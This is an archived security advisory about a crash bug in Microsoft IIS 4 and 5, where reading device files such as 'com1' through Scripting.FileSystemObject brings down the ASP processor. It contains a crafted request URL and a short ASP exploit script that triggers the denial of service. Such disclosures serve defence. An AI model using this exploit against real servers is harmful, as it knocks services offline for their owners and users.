TUCoPS :: Web :: IIS :: iis106~1.htm

IIS ASP processor will crash if device-files are attempted to be opened 
Vulnerability

    IIS

Affected

    MS IIS 4, 5

Description

    VIPER_SV /nerf/team/  found following.   Openning and  reading  of
    device files (com1,  com2, etc.) using  Scripting.FileSystemObject
    will crash ASP-processor (asp.dll).

    So, if you  have permission on  creating .asp-file, you  can crash
    ASP-processor.   Sometimes filename  passing as  asp-script param,
    which open and read data from file.  Passing param as device  file
    will crash asp-processor.

        http://host.int/scripts/script.asp?script=com1

    ASP-Exploit:

    <%
      Dim strFileName, objFSO, objFile
      Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
      strFileName = "com1"
      Set objFile = objFSO.OpenTextFile(strFileName)
      Response.Write objFile.ReadAll
      objFile.Close
    %>

Solution

    Fix Scripting.FileSystemObject  (have to  check file  for existing
    before openning.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH